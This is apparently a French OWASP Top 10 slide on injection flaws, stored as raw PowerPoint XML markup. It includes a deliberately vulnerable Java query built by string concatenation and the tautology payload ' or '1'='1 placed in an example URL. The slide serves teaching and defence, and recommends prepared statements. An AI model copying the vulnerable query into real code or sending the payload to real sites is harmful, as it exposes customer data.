                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Fuzzers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> aident les attaquants à les trouver.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="0" noProof="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L’Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> peut résulter en une perte ou une corruption de données, une perte de droits, ou un refus d’accès. L’Injection peut parfois mener à une prise de contrôle totale du serveur.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez la valeur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> métier de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>la donnée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> impactée </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>et</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la plateforme exécutant l’interpréteur. Toute donnée pourrait être volée, modifiée ou supprimée. Votre réputation pourrait-elle en pâtir?</a:t>
                      </a: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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple de scénario d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’application utilise des données non fiables dans la construction de l’appel SQL vulnérable suivant:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("id") +"'";</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaquant modifie le paramètre ‘id’ dans son navigateur en: ' or '1'='1. Cela modifie le sens de la requête pour récupérer tous les clients, au lieu du seul client concerné.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/accountView?id=' or '1'='1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dans le pire des cas, l’attaquant exploite cette faiblesse pour appeler des procédures stockées spéciales de la base de données permettant une prise de contrôle total de la base, et même potentiellement du serveur hôte hébergeant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cette base.</a:t>
            </a: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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis-je vulnérable à l’Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="300" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le meilleur moyen de savoir si une application est vulnérable à l’Injection est de vérifier que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> utilisation d’interpréteurs sépare explicitement les données non fiables de la commande ou de la requête. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour les appels SQL, cela signifie utiliser des variables liées dans toutes les instructions préparées et procédures stockées, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>évitant les requêtes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamiques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vérifier le code est un moyen rapide et adéquat pour s’assurer que l’application utilise sainement les interpréteurs. Les outils d’analyse de code peuvent aider à localiser l’usage des interpréteurs et tracer leur flux de données à travers l’application. Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentesters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> peuvent valider ces problèmes en concevant des exploits qui confirment la vulnérabilité.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le scan dynamique peut donner un aperçu des failles d’Injection existantes. Les scanners ne savent pas toujours atteindre les interpréteurs, ni si une attaque a réussi. Une mauvaise gestion d’erreur aide à trouver les failles.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRP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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Cheat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Parameterization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Cheat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Command Injection Article</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>eXternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> (XXE) Reference Article</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS: Output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> (V6)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> Guide: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Chapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> on SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
